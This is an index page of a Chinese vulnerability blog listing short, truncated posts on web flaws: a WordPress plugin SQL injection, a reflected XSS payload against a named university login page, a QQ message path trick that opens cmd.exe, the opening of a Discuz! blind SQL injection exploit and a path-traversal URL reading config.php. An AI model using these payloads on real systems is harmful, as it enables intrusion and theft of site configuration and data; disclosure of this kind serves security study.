漏洞信息 - Blog - PortWatcher's Blog

IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结

挺好的，我复制粘贴就没什么意思了，直接给链接吧。 http://lcx.cc/?i=2848

Category: 漏洞信息 | Views: 1137 | Added by: Jury | Date: 2012-11-15 | Comments (0)

WordPress AJAX Post Search插件'srch_txt'参数SQL注入漏洞

我特地下载了这个插件的1.1版本，源码只有一个php文件，cardoza_ajax_search.php。

搜索"srch_txt"，来到42行，代码如下：

Code

if(isset($_POST['srch_txt'])){
  $search_string = stripslashes($_POST['srch_txt']);
  if(!empty($search_string)){
  global $wpdb;
  $search_result_posts = $wpdb->get_col("select ID from $wpdb- >posts where post_title like '%".$search_string."%' AND post_status = 'publish'");
  if(sizeof($search_result_posts)!=0){
  $args = array('post__in'=>$search_result_posts);
  $res = new WP_Query($args);
  echo '<ul>';
&nb ... Read more »

Category: 漏洞信息 | Views: 1551 | Added by: Jury | Date: 2012-11-13 | Comments (0)

杭电新生调查表登录处反射型XSS

By: PortWatcher

很无聊的一个漏洞，应该只能配合社工才能发挥作用。一个GET参数没有过滤。我认为这个参数根本就不该暴露给用户，因为没有意义，可能是因为编程简单一些吧。

URL：http://xsdcb.hdu.edu.cn/login.asp

这个地方的ERRMSG后面的参数直接放入 alert函数，没有做任何过滤。我们可以通过闭合之前的<script>标签，然后构造自己的<script>标签达到让浏览器运行我们构造的JS脚本的目的。

这里还是以弹一个框框为例，注意这里的框框不是MSGERR的框框，而是我们自己构造出来的，我们还可以把它修改为任意XSS，自己看代码，不做过多解释。

例如：

http://xsdcb.hdu.edu.cn/login.asp?ErrMsg=');</script><script>alert('xss pw

Category: 漏洞信息 | Views: 1354 | Added by: Jury | Date: 2012-08-08 | Comments (0)

腾讯TM、QQ消息远程命令执行漏洞

转自李春晓大牛，原文地址http://lcx.cc/?i=2517

当用户发送此类格式"网址”的时候：

Code

www.baidu.com..\..\..\..\..\..\..\Windows\System32\cmd.exe

对方接收之后，点击鼠标左键打开该网址的时候，会被当成路径打开，从而可以恶意执行一些程序、系统命令，造成严重安全隐患。

漏洞原理很简单，不解释了……，条件如下：

1、不能 url 编码，只能明文，囧rz……
2、不能使用中、英文空格，路径会被"打断”。（可以试试自定义发包构造一下，或者尝试一下 Web 端发送。）
3、不能存在 % 号等特殊字符，原因和第一条一样。
4、不能跨分区，例如：..\..\c:\..\Windows\System32\cmd.exe，如果对方QQ没有安装在系统盘，那么效果会大大折扣。
5、网址必须是可信网址，才可以直接点开。
6、字符串长度有限制，大概255字节左右。

空格是个蛋疼问题，不能带参数执行程序了，也许可以试试特殊字符。
可以试试跟踪一下函数调用过程，也许可以直接写入 ShellCo ... Read more »

Category: 漏洞信息 | Views: 532 | Added by: Jury | Date: 2012-05-31 | Comments (0)

serv-u 最新通杀所有版本 EXP

Refer to:

http://sebug.net/vuldb/ssvid-30069

Category: 漏洞信息 | Views: 816 | Added by: Jury | Date: 2012-02-03 | Comments (0)

PJBLOG文件Action.asp 修改任意用户密码

http://sebug.net/vulndb/20648/

Category: 漏洞信息 | Views: 875 | Added by: Jury | Date: 2011-06-26 | Comments (0)

Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit

其实这个漏洞很早很早就有了，只是一直没和广大群众见面。算个Nday

Code

<?php
  print_r('
  +---------------------------------------------------------------------------+
  Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit
  by toby57 2010.11.05
  mail: toby57 at 163 dot com
  team: http://www.wolvez.org
  +---------------------------------------------------------------------------+
  ');
  if ($argc < 2) { &nbs ... Read more »

Category: 漏洞信息 | Views: 1928 | Added by: Jury | Date: 2011-06-03 | Comments (5)

Joomla Component com_versioning SQLi Vulnerability

http://sebug.net/exploit/20527/

Category: 漏洞信息 | Views: 658 | Added by: Jury | Date: 2011-05-14 | Comments (1)

DedeCMS v5.6

没什么时间上网``才看到的```

http://sebug.net/vulndb/20352/

Category: 漏洞信息 | Views: 666 | Added by: Jury | Date: 2011-04-01 | Comments (0)

podcastgen1.3

任意下载:

http://127.0.0.1/podcastgen1.3/download.php?filename=aa.mp3.\..\..\config.php

Category: 漏洞信息 | Views: 996 | Added by: Jury | Date: 2011-01-17 | Comments (0)

1 2 »

分类

站内搜索

日历

友情链接

访问统计(起于2010/10/2)

Blog